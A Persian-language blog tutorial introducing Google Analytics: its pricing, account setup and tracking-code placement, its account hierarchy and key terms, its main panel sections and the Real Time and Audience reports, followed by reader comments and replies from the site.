google analytics یا به اختصار GA یک ابزار تحلیلی قوی برای وب سایت ها و اپلیکیشن هاست که توسط شرکت گوگل ارائه شده. این ابزار همه اطلاعاتی که در محصولات گوگل مثل گوگل Ads، سرچ کنسول و دیتا استودیو وجود داره رو جمع آوری می کنه ، بخاط همین برای کسانی که از محصولات مختلف گوگل استفاده می کنن انتخاب خوبیه. خوب احتمالا الان فکر می کنین که آیا شما هم باید از گوگل آنالیتیکس استفاده کنین یا نه؟

برای پاسخ به این سوال ابتدا باید از خودتون بپرسین آیا دیتای زیادی دارین؟ و آیا وقت و توانایی تجزیه تحلیل و استفاده از این داده ها رو دارین؟ اگر جوابتون به این سوالها بله باشه پس google analytics مناسب ترین ابزاریه که می تونین ازش استفاده کنین. البته درنظر داشته باشین که اگر یه ابزاری میخواین که به راحتی بتونین راه اندازی کنین و خیلی سریع با همه قسمتاش آشنا بشین و کار باهاش رو یاد بگیرین احتمالا از کار کردن با گوگل آنالیتیکس ناامید میشین. ممکنه ابزار دیگه ای وجود داشته باشه که کار کردن با اون راحت تر باشه اما احتمالا اطلاعات کمتری رو می تونه براتون تولید کنه.

گوگل آنالیتیکس چیست؟

شما هم وقتی به صفحه اول گوگل آنالیتیکس نگاه می کنین گیج می شین؟

خب اصلا نگران نباشید، ما در این بخش میخواهیم آموزش گوگل آنالیتیکس رو به صورت کامل و جامع واستون قرار بدیم پس با ما همراه باشید.

یه خبر خوب براتون دارم، شما تنها نیستین و گوگل آنالیتیکس واقعا ابزار ساده ای نیست. وقتی برای اولین بار یه گشتی در گوگل آنالیتیکس زدم با خودم فکر کردم من که هیچی نفهمیدم! مفاهیم زیادی اونجا بود که اصلا درکشون نکرده بودم و تعجب می کردم که بقیه چطور به راحتی ازش استفاده می کنن. بعدش سعی کردم با آزمون و خطا پیش برم و این ابزار رو کشف کنم. البته الان هم نمی تونم بگم که کاملا تسط دارم، اما واقعیت اینه که به راحتی میتونم از این ابزار استفاده کنم و خوب خیلی دلم میخواد که شما هم مثل من بتونین به راحتی ازش استفاده کنید. واسه همون تصمیم گرفتم بهترین و عملی ترین آموزش گوگل آنالیتیکس را واسه شما قرار بدم که شما هم بتونید مثل من از این ابزار که یکی از بهترین ابزار های دیجیتال مارکتینگ است استفاده کنید.
 خوب حالا متوجه شدین که گوگل آنالیتیکس خیلی کاربردیه و باید حتما باهاش کار کنین، سوال بعدی اینه که آیا GA رایگانه؟

گوگل آنالیتیکس دو تا نسخه رایگان و پولی که به نام Analytics 360 شناخته شده، داره. نسخه رایگان برای شرکت های کوچیک و متوسط مناسبه و این شرکت ها می تونن از همه ویژگی های این ابزار استفاده کنن.  اما شرکت های بزرگ و سازمان ها برای استفاده از گزارش های پیشرفته قیف فروش، مدل سازی و گزارش های چند بعدی و …  باید از نسخه پولی استفاده کنن. اگر از نسخه 360 استفاده کنین به یک پشتیبانی اختصاصی از جمله مدیریت اکانت خودتون دسترسی دارین که این موضوع به تنهایی میتونه ارزش این پرداخت رو داشته باشه. البته در مورد هزینه اشتراک هم باید بگم که اصلا مبلغ کمی نیست، هزینه اشتراک سالیانه در آنالیتیکس 360 از 150هزار دلار شروع میشه که باید صورتحساب ماهیانه پرداخت کنین و بعد از اینکه وب سایت شما به بازدید ماهیانه بیش از یک میلیارد رسید هزینه اشتراک افزایش پیدا میکنه.

خوب حالا که هزینه ها رو هم بررسی کردیم بیاین به قسمت های خوب مقاله برسیم.

البته ممکنه که براتون این سوال پیش بیاد که اصلا چرا باید از گوگل آنالیتیکس استفاده کنین که خوب در مقاله های قبلی ویکی دمی دلایل استفاده از این ابزار توضیح داده شده. اما به طور کلی در نظر داشته باشین که هیچ کسب و کاری که در بازار آنلاین هم حضور داره، بدون تحلیل و بررسی ترافیک ورودی اش نمی تونه موفق باشه. اطلاعاتی که گوگل آنالیتیکس در اختیار وبمسترها قرار میده می تونه نقش مهمی رو در بهینه سازی و رشد اون وب سایت داشته باشه. خوب با همه این توضیحات اگر با این ابزار آشنایی ندارین و هیچوقت برای تحلیل وب سایت تون ازش استفاده نکردین پیشنهاد من اینه که این مقاله رو از دست ندین و همراه من باشین تا بتونین از گوگل آنالیتیکس به بهترین شکل استفاده کنین.

مطالبی که در این پست آموزش گوگل آنالیتیکس براتون می نویسم همه چیزهاییه که تو این چند سال یاد گرفتم. ممکنه یکم طولانی باشه اما میتونه بهتون کمک کنه که مثل یک متخصص از این ابزار کاربردی استفاده کنین. در ضمن اگر بعد از خوندن این مقاله سوالی داشتین فقط کافیه تو قسمت نظرات، سوالتون رو بپرسین تا راهنمایی تون کنم.

خوب همراهان عزیز ویکی دمی بریم سراغ آموزش گوگل آنالیتیکس و جزئیات این ابزار قدرتمند رو بررسی کنیم. البته در مقاله های مشابه بخش هایی از این ابزار رو معرفی کردیم که در ابتدای صفحه می‌تونید کمشاهده کنید.

با استفاده از گزارشات Acquisition گوگل آنالیتیکس بررسی کنین بازدیدکنندگان از کجا به سایت شما هدایت میشن.

تجزیه و تحلیل رفتار کاربران در سایت با استفاده از گزارشات Behavior گوگل آنالیتیکس.

 گوگل آنالیتیکس چطور میتونه به سئوی سایت کمک کنه؟

تجزیه و تحلیل وب سایت به دلیل اینکه میتونه میزان کارآیی و اندازه پیشرفت یک کسب و کار رو نشون بده برای کارشناسان بازاریابی بسیار ارزشمنده و برای تجزیه و تحلیل شما نیاز به اطلاعات و داده های زیادی دارین. بدون اطلاعات، بررسی کردن این موضوع که چه چیزهایی روی استراتژی های فعلی سئوی سایت شما تاثیر دارن، تقریبا غیرممکنه.

گوگل آنالیتیکس می تونه اطلاعات زیادی از چگونگی جذب کاربران و تعامل با اونها در وب سایت رو برای شما فراهم کنه که ما در این آموزش google analytics تمامی این موارد را در قالب فیلم های آموزشی برای شما قرار داده ایم. به عنوان مثال شما می تونین بررسی کنین که چندنفر از یک صفحه خاص بازدید کردن، چه مدت اونجا بودن، در کدوم موقعیت جغرافیایی زندگی می کنن، از کدوم کلمات کلیدی استفاده کردن و خیلی اطلاعات دیگه. خوب این نوع اطلاعات دقیقا همون چیزهایی هستن که برای تعیین میزان موثر بودن یک استراتژی سئو بهشون نیاز دارین. با استفاده از این اطلاعات می تونین استراتژی های سئو تون رو به شکلی تغییر بدین که به اهداف موردنظرتون برسین.

 

چطور از گوگل آنالیتیکس استفاده کنیم؟

بخش اصلی موضوعات آموزش گوگل آنالیتیکس در ویکی دمی در مورد استفاده درست از این ابزار بسیار تاثیر گذار است.

 • اگر هنوز یک حساب کاربری در گوگل آنالیتیکس ندارین، یک حساب جدید بسازین. برای این کار باید روی وب سایت با اکانت جی میل لاگین گرده باشین و بعد در گوگل، عبارت Google Analytics رو جستجو کنین. یا اینکه مستقیم وارد سایت گوگل آنالیتیکس بشین google.com/analytics و روی کلید Sign Up کلیک کنین.
 • در صفحه بعد باید اطلاعات وب سایت تون رو وارد کنین. در قسمت website name هم نام وب سایت تون رو بنویسین و در ادامه آدرس و نوع فعالیت وب سایتی که میخواین تجزیه تحلیل کنین رو مشخص کنین.
 • یک کد پیگیری جاوا اسکریپتی به صورت اختصاصی برای سایت شما ایجاد میشه که به GA اجازه میده سایت شما رو نظارت کنه و شما باید این کد رو در وب سایت تون قرار بدین.
 • کد پیگیری رو درست بعد از تگ head سایت تون قرار بدین (اطلاعات بیشتر در این رابطه در ادامه بهتون داده میشه)
 • به پورتال google analytics خودتون برین و کد رو تایید کنین. حال اگر به قسمت گزارش های Real Time برین، این گزارش باید حداقل یک بازدید در سایت رو به شما گزارش بده که در واقع خود شما هستین.

خوب تموم شد! گوگل آنالیتیکس الان روی وب سایت شما فعال شده اما باید 24 ساعت صبر کنین تا گوگل آنالیتیکس بتونه داده های روی وب سایت شما رو بهتون نمایش بده.

5 روشی که در بالا عنوان شد مراحل اصلی هستن که برای کار با GA باید اونها رو انجام بدین. تو این مسیر ممکنه به چند سوال هم بربخورین که من سعی می کنم جواب این سوالها رو هم در این بخش از آموزش گوگل آنالیتیکس بدم . اولین سوال اینه که آیا باید به تمام صفحات وب سایت کد جاوااسکریپتی گوگل آنالیتیکس رو اضافه کنیم؟ اگر مجبور باشیم در هر صفحه این کد رو اضافه کنیم، سایت هایی که بیشتر از 50 صفحه در وب سایت شون دارن چقدر کد باید کپی کنن! یا اینکه اگر یه صفحه جدیدی بسازیم چی؟ مجبوریم دوباره بریم و کد رو کپی کنیم.

خوب بذارین خیالتون رو راحت کنم نیازی به این نیست که در همه صفحات این کد رو اضافه کنیم. البته جواب کامل تر به این سوال به این شکله: اگر برای تمامی صفحات سایت تون از یک قالب استفاده کردین یعنی تمام صفحات از یک ماژول هدر استفاده می کنین پس نیازی نیست جداگانه این کد رو در همه صفحات کپی کنین. کافیه ماژول هدرتون رو تغییر بدین تا همه صفحات تون به روزرسانی بشن. اگر دو تا قالب صفحه دارین (مثلا صفحه اصلی و صفحات داخلی) باید در هر دو صفحه کد رو کپی کنین. سه نوع قالب چی؟ بله باید سه بار کپی کنین.

اگر از CMS هایی مثل وردپرس یا هاب اسپات استفاده می کنین این کار برای شما راحت تره، فقط کافیه یکبار در بخش جداگانه ای از این پورتال ها که مخصوص قرار دادن کد رهگیری هست استفاده کنین و کدتون رو کپی کنین. برای اطلاعات بیشتر در رابطه با این موضوع مقاله چطور ردیابی رویداد (Event Tracking) گوگل آنالیتیکس را راه اندازی کنیم رو حتما مطالعه کنین.

 

اصطلاحات و تعاریف گوگل آنالیتیکس

برای راه اندازی و استفاده ار google analytics باید لایه های مختلف این ابزار رو بشناسین.

لایه اول – سازمان (Organization)

این لایه بالاترین سطح در گوگل آنالیتیکس و در واقع نشان دهنده حساب یک سازمان یا شرکته. به عنوان مثال هاب اسپات یک سازمانه و میتونه شامل چندین حساب کاربری در گوگل آنالیتیکس باشه. این لایه برای شرکت های بزرگ کاربردیه اما اجباری نیست که همه شرکت های بزرگ این لایه رو هم داشته باشن.

لایه دوم – حساب(های) کاربری (Account)

ایجاد حساب کاربری برای استفاده از گوگل آنالیتیکس اجباریه. یعنی برای اینکه بتونین با گوگل آنالیتیکس کار کنین باید حداقل یک حساب کاربری (گاهی اوقات چند حساب) داشته باشین. البته این حساب فقط مربوط به یک شخص خاص نیست، مثلا من می تونم با استفاده از ایمیلی که در گوگل دارم وارد حساب کاربری شرکتمون بشم، مدیر سئو هم می تونه با ایمیل خودش وارد همون حساب کاربری بشه، مدیر فنی شرکت هم میتونه به این حساب کاربری با ایمیل خودش دسترسی داشته باشه. پس باید یک حساب کاربری برای کسب و کارتون بسازین و به اعضای تیم تون دسترسی های لازم رو بدین.

 

لایه سوم – مشخصه (Property)

یک مشخصه میتونه وب سایت یا یک اپلیکیشن باشه و هر مشخصه میتونه حدکثر 25 نما رو پشتیبانی کنه.

لایه چهارم – نما (View)

برای هر مشخصه حداقل به دو نما نیاز دارین. نمای اول با پیکربندی صفر که در واقع همون نمای خام و تنظیم نشده ست و نمای دوم با فیلترهایی که تنظیم شدن تا ترافیکی که از IP شرکت شما به سایت میاد، بات ها و اسپم ها رو حذف کنن. نمای دوم فقط اطلاعاتی رو ثبت می کنه از فیلترها و تنظیمات این نما گذشته باشه. یادتون باشه که اگر یک نما رو حذف کنین، این داده ها از بین میرن و به همین دلیل داشتن نمای بدون فیلتر بسیار مهمه.

اصطلاحات اصلی گوگل آنالیتیکس

در این بخش اصلی ترین اصطلاحاتی که در گوگل آنالیتیکس مشاهده می‌کنید را توضیح میدهیم. برای هر یک از این اصطلاحات مقالات اختصاصی برای شما کاربران ویکی دمی آماده کرده ایم و در ابتدای همین مقاله آموزش گوگل آنالیتیکس قرار داده‌ایم.

ابعاد (Dimensions):

بعد یا دایمنشن یکی از خصوصیات یک وب سایته که می تونه مقادیر مختلفی داشته باشه. نوع مرورگر، صفحه خروج کاربر، صفحاتی که بازدید میشن و زمان حضور کاربر در وب سایت دایمنشن هایی هستن که در گوگل آنالیتیکس وجود دارن.

معیار (Metrics):

معیارها یا متریک ها در واقع خصوصیات درونی یک دایمنشن هستن که به شکل مجموع یا نرخ، اندازه گیری بشن. به عنوان مثال تعداد بازدیدهای یک صفحه خاص یا متوسط زمانی که کاربران در یک صفحه هستن، نمونه هایی از متریک های گوگل آنالیتیکس هستن.

در هر گزارش GA، می تونین ابعاد و معیارها رو با هم ببینین. در واقع ردیف ها ابعاد شما هستن و ستون ها مقادیر مربوط به معیارها رو نمایش میدن:

 

دوره (Session):

دوره یا سِشن به مدت زمانی گفته می شه که کاربر به صورت فعال با وب سایت شما در ارتباطه. در یک سشن تمام اطلاعات مربوط به تعامل کاربر که میتونه شامل تعداد صفحاتی که بازدید شده، میزان خریدو … حساب میشن.  معمولا اگر کاربر بیشتر از نیم ساعت با وب سایت تعامل نداشته باشه سشن مربوط به اون کاربر بسته میشه و در صورتی که دوباره به سایت برگرده یک سشن جدید براش باز میشه.

نرخ تبدیل (Conversion):

یک تبدیل زمانی اتفاق میفته که کاربری اهداف موردنظر شما رو عملی کنه و از یک کاربر معمولی به مشتری شما تغییر کنه. این تبدیل میتونه شامل تبدیل بازدیدکننده به کاربر سایت یا تبدیل کاربر به خریدار باشه. مثلا وقتی یک کاربر در سایت شما ثبت نام میکنه، یا درخواست خریدش رو ثبت میکنه و یا اینکه بابت سبد خریدی که داشته در سایت شما پرداخت میکنه.
نرخ تبدیل یکی از مهمترین فاکتور هایی است که در مباحث دیجیتال مارکتینگ به آن نیاز خواهید داشت و تحلیل درستی از آن و رشد روز به روز این نرخ کمک بسیار زیادی به کمپین های تبلیغاتی شما می‌کند.
ما هم در بخش آموزش گوگل آنالیتیکس توضیحات کاملی در مورد نرخ تبدیل برای شما عزیزان قرار خواهیم داد.

قبل از اینکه بریم سراغ گزارش ها که مهمترین بخش گوگل آنالیتیکس هستن، بهتره یه نگاهی به قسمت های مختلف این ابزار مهم داشته باشیم تا بدونیم هر کدوم از قسمت ها چه کاربردی دارن. در نوار سمت چپ در پنل گوگل آنالیتیکس علاوه بر انوع گزارش ها 4 نوع دسترسی دیگه هم دارین که از بالا به پایین به ترتیب Home، Customization، Discover و Admin هستن. ما در این آموزش گوگل آنالیتیکس سعی می‌کنیم تمامی این بخش ها را معرفی کنیم اما در آینده در یک دوره جامع و حرفه ای به صورت کامل این ابزار خیلی مهم را مورد برسی قرار می‌دهیم و گزارش های آن را تحلیل می‌کنیم.

آموزش خانه (Home) در گوگل آنالیتیکس

با لاگین کردن در حساب کاربریتون وارد این صفحه میشین، جایی که می تونین یک نگاه کلی به وضعیت وب سایت تون داشته باشین. اطلاعاتی که در این قسمت به شما نمایش داده میشه به صورت پیش فرض روی 7 روز گذشته است. اطلاعاتی مثل تعداد کاربران سایت، نرخ تبدیل کاربران، میزان فروش، موقعیت جغرافیایی کابران و موارد دیگه. برای دسترسی به اطلاعات جزئی تر در هر قسمت باید روی گزینه Overview که در پایین هر بخش قرار داره کلیک کنین.

همونطور که قبلا در این آموزش گوگل آنالیتیکس اشاره کردم همه اطلاعات به صورت پیش فرض در بازه زمانی یک هفته به شما نمایش داده میشه. در صورتی که بخواین بازه زمانی متفاوتی رو بررسی کنین می تونین از تقویمی که در سمت راست صفحه قرار گرفته استفاده کنین:

همچنین می تونین دو بازه زمانی رو با هم مقایسه کنین، با انتخاب گزینه Compare to، اطلاعات داده شده به صورت مقایسه ای از دو بازه زمانی نمایش داده میشه. این نوع مقایسه بهتون کمک می کنه متریک ها رو در بازه زمانی متفاوت با هم مقایسه کنین و ببینین رشد داشتن یا نه.

 

آموزش شخصی سازی (Customization) در آنالیتیکس

این بخش 4 قسمت متفاوت داره. در قمست Dashboard می تونین یک داشبورد (میزکار) شخصی برای خودتون تعریف کنین. در قسمت Custom Report هم گزارشات شخصی سازی شده برای خودتون تعریف کنین، یعنی گزارشاتی که هدف خاصی دارن مثلا گزارش مربوط به یک رویداد خاص در وب سایت تون یا اینکه اهداف مدنظرتون رو با متریک های خاصی که خودتون تعیین کردین ارزیابی کنین. در قسمت Saved Reports به هر گزارشی که در جاهای مختلف ذخیره کرده باشین دسترسی دارین و در قسمت Custom Alert می تونین یک سری هشدار برای خودتون تعریف کنین. به عنوان مثال یک هشدار برای زمانی که فروش شما در روز 100 سفارش رو رد کرد یک ایمیل به شما ارسال بشه.

 

آموزش کشف کردن (Discover) در گوگل آنالیتیکس

این بخش یک راهنمای جامع و کامل برای یادگیری قسمت های مختلف گوگل آنالیتیکسه. اگر به زبان انگلیسی مسلط هستین توصیه می کنم از این آموزش ها استفاده کنین.

 

آموزش مدیریت (Admin) در گوگل آنالیتیکس

در این قسمت می تونین تنظیمات مربوط به اکانت گوگل آنالیتیکس و سایت تون رو انجام بدین. علاوه بر این تنظیمات مربوط به ایجاد اهداف هم در این قسمت قرار گرفته.

 

گزارش های گوگل آنالیتیکس

خوب همراهان ویکی دمی رسیدیم به مهمترین بخش گوگل آنالیتیکس: گزارشات. لیست این گزارشات که 5 نوع گزارش متفاوت هستن رو می تونین در نوار سمت چپ پنل تون ببینین و با کلیک کردن روی هر گزارش به جزئیات بیشتری دسترسی داشته باشین. همراه من باشین تا گزارش ها رو به ترتیب بررسی کنیم:

 

 • گزارش Real Time (لحظه ای) گوگل آنالیتیکس

همونطور که از اسم این گزارش مشخصه، گزارش Real Time، اطلاعاتی که در لحظه در سایت تون در حال اتفاق افتادنه رو بهتون نمایش میده. می تونین در لحظه ببینین که چند نفر از سایت شما بازدید می کنن، کدوم صفحات رو بازدید می کنن، از کدوم شبکه اجتماعی به سایت شما اومدن، موقعیت جغرافیایی بازدیدکنندگان کجاست و موارد دیگه. درسته که این گزارش بعضی اوقات جالب به نظر میاد اما بین گزارش های گوگل آنالیتیکس ارزش کمتری داره. چند مورد از این نوع گزارش که برای من کاربردی بوده رو براتون لیست میکنم:

 • می تونین ببینین از یک پست جدید در شبکه های اجتماعی چقدر ترافیک داشتین.
 • یک بررسی فوری داشته باشین که یک برنامه فروش یک روزه چقدر منجر به بازدید و کانورشن (تبدیل به مشتری) شده.
 • می تونین از درستی عملکرد ردیابی آدرس ها و رویدادها مطمئن بشین.

خوب همونطور که می بینین این نوع گزارش ها هم ممکنه به دردتون بخورن اما گزارش های دیگه اطلاعات ارزشمندتری رو در اختیارتون قرار میدن.

 

 • گزارش Audiences (مخاطبان) گوگل آنالیتیکس

 

Overview (دید کلی)

این گزارش یک دید کلی از مشخصه های گزارشی که در حال مشاهده اون هستین بهتون ارئه میده. بهتره این گزارش رو حداقل روزی یک بار بررسی کنین تا همیشه نگاهی به روند رشد سایت تون داشته باشین.

زیر لینک Overview می تونین به گزارش های جزئی تری از این بخش دسترسی داشته باشین، هر کدوم از لینک ها رو که انتخاب کنین گزارش موضوعی از مخاطبانتون رو بهتون ارائه میده که بر اساس عنوانی که نوشته شده مخاطبان سایت رو براتون دسته بندی می کنه:

 

Active Users (کاربران فعال)

فکر می کنم کسی که اسم این گزارش رو  انتخاب کرده از نوادگان همون کسی باشه که اسم خوکچه های هندی رو انتخاب کرده، چون خوکچه های هندی نه خوک هستن و نه هندی، بله کاملا بی ربطه! کاربران فعال هم در اینجا، اشاره به کاربرانی که در حال حاضر در سایت شما هستن نداره، چون این گزارش اصلا یک گزارش Real Time نیست. این گزارش، تعداد کاربران فعال که در روز گذشته (کاربران فعال یک روزه)، هفته (کاربران فعال در 7 روز)، دوهفته (کاربران فعال در 14 روز) و چهارهفته (کاربران فعال در 28 روز) سایت شما رو بازدید کردن به شما نمایش میده.

احتمالا براتون سوال پیش اومده که این نوع گزارش چه ارزشی داره؟

از این گزارش اطلاعات خوبی می تونین به دست بیارین، مثلا اگر تعداد کاربران یک روزه شما از دسته های دیگه بیشتره معنیش اینه که شما برای نگه داشتن کاربران در سایت تون موفق نبودین. یعنی مردم بعد از یک بار بازدید به سایت یا اپلیکیشن شما برنمی گردن و شما باید علت این موضوع رو پیدا کنین.

پیشنهاد من اینه که گزارشات این بخش رو در ابعاد مختلف بررسی کنین مثلا ممکنه ببینین که کاربران یک گروه سنی خاص، نرخ بازگشت بالاتری نسبت به سن میانگین کاربران شما دارن.

 

Lifetime Value (ارزش کاربران جذب شده)

سوال اول اینه که شما در کسب و کارتون CLV (Customer Lifetime Value) رو چطور حساب می کنین؟ خوب اگه برای محاسبه این متریک مشکل دارین گوگل آنالیتیکس میتونه بهتون کمک کنه.

با استفاده از این گزارش می تونین ارزشی که کاربران برای کسب و کار شما داشتن رو محاسبه کنین. حتی می تونین میزان ارزش ایجاد شده توسط کاربران در کانال های متفاوت رو با هم مقایسه کنین. به عنوان مثال، اگر کاربرانی که از طریق بازاریابی ایمیلی جذب شدن نسبت به کاربرانی که از طریق جستجوی ارگانیک به سایت شما رسیدن ارزش بیشتری ایجاد کردن پس باید روی کانال ایمیل سرمایه گذاری بیشتری کنین.

این متریک به صورت پیش فرض روی Revenue Per User تنظیم شده یعنی ارزش مادی که یک کاربر در 90 روز گذشته، از روزی که جذب شده، به چه صورتی بوده است که البته می تونین بازه زمانی رو تغییر بدین. به عنوان مثال اگر برنامه  حراج آخر هفته دارین و میخواین نگاهی به تراکنشاتی که هر کاربر در هفته گذشته داشته نگاهی بندازین، کافیه دامنه تاریخی رو در اون بازه خاص تنظیم کنین و گزارشات مربوط به حراج رو بررسی کنین.

نکته مهم در این گزارش اینه که ارزش کاربر رو می تونین با توجه به اهدافی که دارین تغییر بدین. مثلا اگر برای شما ثبت نام در سایت هم یک هدف باشه باید در متریک اول ارزش رو روی این هدف خاص قرار بدین.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

هفده + 1 =

8

 1. بهزاد

  دیگته من مربوط به سایت شما میتونه برای افرادی که مناسب باشد که از لحاظ مالی توان زیادی ندارند و میخوان تو بحث کارهای سئو درامد زایی داشته باشند خوبه و مفید است

  20 سپتامبر 2020 پاسخ
  • ایمان قادری

   سلام دوست عزیز
   ممنون از شما
   ما سعی میکنیم تمامی خدمات را یا با قیمت بسیار مناسب و یا به صورت رایگان ارائه کنیم تا توی این اوضاع اقتصادی کشور بتونیم کمک کنیم به دوستانی که می خواهند متخصص بشن

   21 سپتامبر 2020 پاسخ
 2. حمید

  واقعا عالی بود مختصر و مفید برای آشنایی و راهگشا

  04 نوامبر 2019 پاسخ
  • ویکی دمی

   سلام دوست عزیز
   ممنون از شما
   توصیه میکنیم برای تسلط بیشتر روی گوگل آنالیتیکس از دوره ی رایگان ما دیدن کنید
   https://wikidemy.ir/course/google-analytics-essential-training/

   04 نوامبر 2019 پاسخ
 3. takavar7495

  سلام
  خسته نباشید
  وقتتون بخیر
  این دوره ها فوق العادست.
  فقط یه سوال داشتم. سطح این دوره ها تقریبا معادل با کدوم سطح از آکادمی گوگل هستش؟(begginer-advance-power)
  ینی اگه کسی کاملا مسلط بشه روی این دوره ها،میتونه بگه که در سطح advance گوگل بلده؟؟
  و اینکه محتوای این دوره ها چند درصد از هر سطح گوگل آکادمی رو کاور میکنه؟

  04 نوامبر 2019 پاسخ
  • ویکی دمی

   سلام دوست عزیز
   خوشحالیم که توانسته ایم که به شما کمک کنیم
   دوست عزیز از این لینک وارد این دوره بشید
   دوره آموزش گوگل آنالیتیکس
   این دوره و آموزش هایی که قرار اده می‌شود رد سطخ مقدماتی و متوسط میباشد و شامل تکنیک های پیشرفته در آنالیتیکس نیست
   شما با مطالعه تمامی آموزش هایی که قرار دادده شده است تا حد قابل قبولی که بتوانید نیاز های خودتونو رفع کنید یاد میگیرید.
   مبانی حرفه ای تری در گوگل آنالیتیکس هست که در آینده دوره ای برای آن قرار میدیم.
   اما سر فصل های این دوره از دوره های معتبر اساتید بزرگ دنیا گرفته شده و از بسیاری از دوره های پولی حال حاضر کاربردی تر است

   04 نوامبر 2019 پاسخ
 4. محمد

  واقعا آموزش هایی که در مورد گوگل آنالیتیکس قرار دادین خیلی عالی بود
  اینکه این همه موضوع آموزشی را به صورت رایگان قرار میدین واقعا کار عجیبیه و دمتون گرمو خدا قوت
  من goal هایی که در گوگل آنالیتیکس ساختم دقیقا مطابق آموزش شما بود و خیلی بهم کمک کرد
  باز هم آموزش های خیلی خوب بزارید که ما هایی که امکان استفاده از دوره های حضوری نداریم بتونیم استفاده کنیم چون بنده ساکن یکی از شهرستان های استان آذربایجان هستم
  باز هم ممنون از سایت خوب ویکی دمی

  21 سپتامبر 2019 پاسخ
  • ویکی دمی

   سلام دوست عزیز
   خوشجالیم که آموزش گوگل آنالیتیکس ما در ویکی دمی توانسته نظر شما دوست عزیز را به خود جلب کند
   بله واقعا دوستانی که در شهرستان های مختلف زندگی می‌کنند مقداری در شرایط سخت تر امکان حضور در کلاس های آموزشی را دارند.
   ما هم در ویکی دمی تمامی تلاشمان بر این است که بتوانیم آموزش های عملی در اختیار شما قرار بدیم.
   ما یک دوره رایگان نیز در سایت دارید که تمامی مباحث گوگل آنالیتیکس را پوشش می‌دهد و در حال تولید آن هستیم که از لینک زیر می‌توانید در این دوره به صورت رایگان ثبت نام کنید
   دوره رایگان گوگل آنالیتیکس

   21 سپتامبر 2019 پاسخ